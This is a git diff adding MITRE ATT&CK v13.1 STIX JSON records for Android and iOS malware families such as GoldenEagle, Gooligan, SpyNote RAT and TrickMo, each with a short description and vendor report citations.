"bundle--f1cf39bb-ef09-4f3a-ab49-c4b9445f409d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "GoldenEagle" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "type": "malware", + "created": "2020-12-24T22:04:27.667Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0551", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0551" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-03-25T16:20:28.165Z", + "name": "GoldenEagle", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) is a piece of Android malware that has been used in targeting of Uyghurs, Muslims, Tibetans, individuals in Turkey, and individuals in China. Samples have been found as early as 2012.(Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--108b2817-bc01-404e-8e1b-8cdeec846326.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--108b2817-bc01-404e-8e1b-8cdeec846326.json new file mode 100644 index 0000000000000000000000000000000000000000..5d563981e67bda3b8f440412fa0f188e62fcefc9 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--108b2817-bc01-404e-8e1b-8cdeec846326.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--5528cf9f-38af-4967-8e7d-b4d1a746e54e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-21T18:53:30.817Z", + "name": "Bread", + "description": "[Bread](https://attack.mitre.org/software/S0432) was a large-scale billing fraud malware family known for employing many different cloaking and obfuscation techniques in an attempt to continuously evade Google Play Store\u2019s malware detection. 1,700 unique Bread apps were detected and removed from the Google Play Store before being downloaded by users.(Citation: Google Bread)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_contributors": [ + "Sergey Persikov, Check Point", + "Jonathan Shimonovich, Check Point", + "Aviran Hazum, Check Point" + ], + "x_mitre_aliases": [ + "Bread", + "Joker" + ], + "type": "malware", + "id": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "created": "2020-05-04T14:04:55.823Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0432", + "external_id": "S0432" + }, + { + "source_name": "Joker", + "description": "(Citation: Google Bread)" + }, + { + "source_name": "Google Bread", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020.", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--172444ab-97fc-4d94-b142-179452bfb760.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--172444ab-97fc-4d94-b142-179452bfb760.json new file mode 100644 index 0000000000000000000000000000000000000000..692d139633e8f1711b1767acb4954eddd905ae02 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--172444ab-97fc-4d94-b142-179452bfb760.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--e5c88e57-198d-4441-abb6-70ea2a8e408a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Judy", + "description": "[Judy](https://attack.mitre.org/software/S0325) is auto-clicking adware that was distributed through multiple apps in the Google Play Store. (Citation: CheckPoint-Judy)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--172444ab-97fc-4d94-b142-179452bfb760", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0325", + "external_id": "S0325" + }, + { + "source_name": "Judy", + "description": "(Citation: CheckPoint-Judy)" + }, + { + "source_name": "CheckPoint-Judy", + "description": "CheckPoint. (2017, May 25). The Judy Malware: Possibly the largest malware campaign found on Google Play. Retrieved September 18, 2018.", + "url": "https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2074b2ad-612e-4758-adce-7901c1b49bbc.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2074b2ad-612e-4758-adce-7901c1b49bbc.json new file mode 100644 index 0000000000000000000000000000000000000000..8e456f085080c494484f4a41aef2887a98bbd8d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2074b2ad-612e-4758-adce-7901c1b49bbc.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--7db51091-9cab-48f4-b4bd-cd6a3f732a58", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "OldBoot", + "description": "[OldBoot](https://attack.mitre.org/software/S0285) is an Android malware family. (Citation: HackerNews-OldBoot)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--2074b2ad-612e-4758-adce-7901c1b49bbc", + "created": "2017-10-25T14:48:45.155Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0285", + "external_id": "S0285" + }, + { + "source_name": "OldBoot", + "description": "(Citation: HackerNews-OldBoot)" + }, + { + "source_name": "HackerNews-OldBoot", + "description": "Sudhir K Bansal. (2014, January 28). First widely distributed Android bootkit Malware infects more than 350,000 Devices. Retrieved December 21, 2016.", + "url": "http://thehackernews.com/2014/01/first-widely-distributed-android.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--20d56cd6-8dff-4871-9889-d32d254816de.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--20d56cd6-8dff-4871-9889-d32d254816de.json new file mode 100644 index 0000000000000000000000000000000000000000..86c3e91a5360543ad292e3273860a1f280483a47 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--20d56cd6-8dff-4871-9889-d32d254816de.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--5f03db16-72e5-4167-a3e1-ac0ee7d3ba2a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Gooligan", + "description": "[Gooligan](https://attack.mitre.org/software/S0290) is a malware family that runs privilege escalation exploits on Android devices and then uses its escalated privileges to steal authentication tokens that can be used to access data from many Google applications. [Gooligan](https://attack.mitre.org/software/S0290) has been described as part of the Ghost Push Android malware family. (Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Gooligan", + "Ghost Push" + ], + "type": "malware", + "id": "malware--20d56cd6-8dff-4871-9889-d32d254816de", + "created": "2017-10-25T14:48:43.242Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0290", + "external_id": "S0290" + }, + { + "source_name": "Gooligan", + "description": "(Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)" + }, + { + "source_name": "Ghost Push", + "description": "Gooligan has been described as being part of the Ghost Push Android malware family. (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)" + }, + { + "source_name": "Gooligan Citation", + "description": "Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. Retrieved December 12, 2016.", + "url": "http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/" + }, + { + "source_name": "Ludwig-GhostPush", + "description": "Adrian Ludwig. (2016, November 29). The fight against Ghost Push continues. Retrieved December 12, 2016.", + "url": "https://plus.google.com/+AdrianLudwig/posts/GXzJ8vaAFsi" + }, + { + "source_name": "Lookout-Gooligan", + "description": "Lookout. (2016, December 1). Ghost Push and Gooligan: One and the same. Retrieved December 12, 2016.", + "url": "https://blog.lookout.com/blog/2016/12/01/ghost-push-gooligan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23.json new file mode 100644 index 0000000000000000000000000000000000000000..e838e95545e41a90b701fbf572d6c722e2e0c665 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--a5eb8d93-d28a-4a6c-975d-f8955a72c273", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "SpyNote RAT", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) (Remote Access Trojan) is a family of malicious Android apps. The [SpyNote RAT](https://attack.mitre.org/software/S0305) builder tool can be used to develop malicious apps with the malware's functionality. (Citation: Zscaler-SpyNote)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "SpyNote RAT" + ], + "type": "malware", + "id": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "created": "2017-10-25T14:48:45.794Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0305", + "external_id": "S0305" + }, + { + "source_name": "SpyNote RAT", + "description": "(Citation: Zscaler-SpyNote)" + }, + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--21170624-89db-4e99-bf27-58d26be07c3a.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--21170624-89db-4e99-bf27-58d26be07c3a.json new file mode 100644 index 0000000000000000000000000000000000000000..e5bdc2782fb17e57b65a25dd7fd1efa6b469e045 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--21170624-89db-4e99-bf27-58d26be07c3a.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--3394ec8e-87c4-45bd-aa99-a1579f3f86da", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Ohad Mana, Check Point", + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "TrickMo" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "type": "malware", + "created": "2020-04-24T17:46:31.111Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0427", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0427" + }, + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-09-11T15:57:37.561Z", + "name": "TrickMo", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) a 2FA bypass mobile banking trojan, most likely being distributed by [TrickBot](https://attack.mitre.org/software/S0266). [TrickMo](https://attack.mitre.org/software/S0427) has been primarily targeting users located in Germany.(Citation: SecurityIntelligence TrickMo)\n\n[TrickMo](https://attack.mitre.org/software/S0427) is designed to steal transaction authorization numbers (TANs), which are typically used as one-time passwords.(Citation: SecurityIntelligence TrickMo) ", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901.json new file mode 100644 index 0000000000000000000000000000000000000000..7156926206adffaf94c1d0b2e782d6451f78e438 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--bf391fe1-9a25-402a-b45b-82fead99edb9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "INSOMNIA" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "type": "malware", + "created": "2020-06-02T14:32:31.461Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0463", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0463" + }, + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-24T18:24:35.433Z", + "name": "INSOMNIA", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) is spyware that has been used by the group Evil Eye.(Citation: Volexity Insomnia)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--22b596a6-d288-4409-8520-5f2846f85514.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--22b596a6-d288-4409-8520-5f2846f85514.json new file mode 100644 index 0000000000000000000000000000000000000000..5aef030d9bb53a69558d1a9c03b7ddad32399aaf --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--22b596a6-d288-4409-8520-5f2846f85514.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--c50a956e-ecce-407a-be0a-9b949626d2bc", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Dvmap" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "type": "malware", + "created": "2019-12-10T16:07:40.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0420", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0420" + }, + { + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019.", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "source_name": "SecureList DVMap June 2017" + } + ], + "modified": "2020-01-22T22:17:23.015Z", + "name": "Dvmap", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) is rooting malware that injects malicious code into system runtime libraries. It is credited with being the first malware that performs this type of code injection.(Citation: SecureList DVMap June 2017)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--22faaa56-a8ac-4292-9be6-b571b255ee40.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--22faaa56-a8ac-4292-9be6-b571b255ee40.json new file mode 100644 index 0000000000000000000000000000000000000000..5ef1a736d35c7bc984442bd01ceb0837b336d71d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--22faaa56-a8ac-4292-9be6-b571b255ee40.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--e5cea4f3-f1d7-41df-9757-a10610df012c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Zen" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "type": "malware", + "created": "2020-07-27T14:14:56.729Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0494", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0494" + }, + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." + } + ], + "modified": "2020-08-11T14:23:15.002Z", + "name": "Zen", + "description": "[Zen](https://attack.mitre.org/software/S0494) is Android malware that was first seen in 2013.(Citation: Google Security Zen)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe.json new file mode 100644 index 0000000000000000000000000000000000000000..1a8f43caac646ff5bc49d377ead3da398841aaf4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--e2c13dcf-b3c2-4cc4-b18e-531e6346de72", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "NotCompatible", + "description": "[NotCompatible](https://attack.mitre.org/software/S0299) is an Android malware family that was used between at least 2014 and 2016. It has multiple variants that have become more sophisticated over time. (Citation: Lookout-NotCompatible)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe", + "created": "2017-10-25T14:48:36.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0299", + "external_id": "S0299" + }, + { + "source_name": "NotCompatible", + "description": "(Citation: Lookout-NotCompatible)" + }, + { + "source_name": "Lookout-NotCompatible", + "description": "Tim Strazzere. (2014, November 19). The new NotCompatible: Sophisticated and evasive threat harbors the potential to compromise enterprise networks. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/11/19/notcompatible/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c.json new file mode 100644 index 0000000000000000000000000000000000000000..f8888f95f19c70893fbcd1e2736453bf145d8e7b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--625c2048-8ea8-48cf-834d-415b3ffc6346", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "XLoader for Android", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) is a malicious Android app first observed targeting Japan, Korea, China, Taiwan, and Hong Kong in 2018. It has more recently been observed targeting South Korean users as a pornography application.(Citation: TrendMicro-XLoader-FakeSpy)(Citation: TrendMicro-XLoader) It is tracked separately from the [XLoader for iOS](https://attack.mitre.org/software/S0490).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "XLoader for Android" + ], + "type": "malware", + "id": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0318", + "external_id": "S0318" + }, + { + "source_name": "XLoader for Android", + "description": "(Citation: TrendMicro-XLoader)" + }, + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" + }, + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--28e39395-91e7-4f02-b694-5e079c964da9.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--28e39395-91e7-4f02-b694-5e079c964da9.json new file mode 100644 index 0000000000000000000000000000000000000000..48f4263440226ed89fde64bfbd68120681b6bbf0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--28e39395-91e7-4f02-b694-5e079c964da9.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--dd50ce6e-a2b5-41ed-a290-68a28eb4cfcd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Trojan-SMS.AndroidOS.FakeInst.a", + "description": "[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) is Android malware. (Citation: Kaspersky-MobileMalware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--28e39395-91e7-4f02-b694-5e079c964da9", + "created": "2017-10-25T14:48:46.107Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0306", + "external_id": "S0306" + }, + { + "source_name": "Trojan-SMS.AndroidOS.FakeInst.a", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--29944858-da52-4d3d-b428-f8a6eb8dde6f.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--29944858-da52-4d3d-b428-f8a6eb8dde6f.json new file mode 100644 index 0000000000000000000000000000000000000000..dd65e5ec3731006af6c57b286f216f03a701f898 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--29944858-da52-4d3d-b428-f8a6eb8dde6f.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--26d0b1b8-b678-4b2b-8e7a-881a06608342", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "XLoader for iOS" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "type": "malware", + "created": "2020-07-20T13:58:53.422Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0490", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0490" + }, + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." + } + ], + "modified": "2021-12-07T14:46:08.852Z", + "name": "XLoader for iOS", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) is a malicious iOS application that is capable of gathering system information.(Citation: TrendMicro-XLoader-FakeSpy) It is tracked separately from the [XLoader for Android](https://attack.mitre.org/software/S0318).", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2aec175b-4429-4048-8e09-3ef6cbecfc64.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2aec175b-4429-4048-8e09-3ef6cbecfc64.json new file mode 100644 index 0000000000000000000000000000000000000000..ee61da4576c482c4b71a3d7782d1900a16e128f2 --- /dev/null 